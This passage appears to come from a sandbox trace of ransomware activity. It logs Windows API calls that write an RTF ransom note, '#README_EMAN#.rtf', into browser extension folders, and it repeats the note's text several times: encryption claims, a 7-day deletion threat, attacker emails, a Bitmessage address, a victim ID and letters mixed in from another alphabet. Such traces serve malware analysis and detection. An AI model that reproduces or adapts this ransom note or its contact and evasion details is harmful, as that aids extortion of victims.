\\f1\\lang1049\\'e0\\f0\\lang1033 nd click th\\f1\\lang1049\\'e5\\f0\\lang1033 \"Sign in\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n. \\f1\\lang1049 \\f0\\lang1033\\par\r\n4. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"\\f1\\lang1049\\'d1\\f0\\lang1033 r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 R\\f1\\lang1049\\'e0\\f0\\lang1033 nd\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n5. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"N\\f1\\lang1049\\'e5\\f0\\lang1033 w m\\f1\\lang1049\\'e0\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n\\b 6. S\\f1\\lang1049\\'e5\\f0\\lang1033 nding m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 :\\par\r\nT\\f1\\lang1049\\'ee\\f0\\lang1033 :\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss: \\b BM-2cXRWRW5Jv5hxbhgu2HJSJrtPf92iKshhm\\par\r\n\r\n\\pard\\sl240\\slmult1 Subj\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 t:\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b 460F9943EA70F103\\par\r\nM\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 : \\b0 D\\f1\\lang1049\\'e5\\f0\\lang1033 scrib\\f1\\lang1049\\'e5\\f0\\lang1033 wh\\f1\\lang1049\\'e0\\f0\\lang1033 t \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u think n\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 .\\par\r\n\r\n\\pard\\ri-74\\sa200\\sl240\\slmult1\\tx8378\\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"S\\f1\\lang1049\\'e5\\f0\\lang1033 nd m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\cf5\\b\\par\r\n\r\n\\pard\\sa200\\sl240\\slmult1\\fs28 GCMD9HhH\\cf0\\f1\\fs32\\lang1049\\par\r\n\\par\r\n}\r\n", lpUsedDefaultChar=0x0) returned 8717 [0292.163] WriteFile (in: hFile=0x2e8, lpBuffer=0x1ef8bd8*, nNumberOfBytesToWrite=0x220d, lpNumberOfBytesWritten=0x374fdb4, lpOverlapped=0x0 | out: lpBuffer=0x1ef8bd8*, lpNumberOfBytesWritten=0x374fdb4*=0x220d, lpOverlapped=0x0) returned 1 [0292.163] CloseHandle (hObject=0x2e8) returned 1 [0292.163] GetFileAttributesW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\fi\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\fi\\#readme_eman#.rtf")) returned 0xffffffff [0292.163] GetLastError () returned 0x2 [0292.163] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\fi\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\fi\\#readme_eman#.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2e8 [0292.164] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0292.164] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0292.164] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x1ef8bd8, cbMultiByte=8717, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. 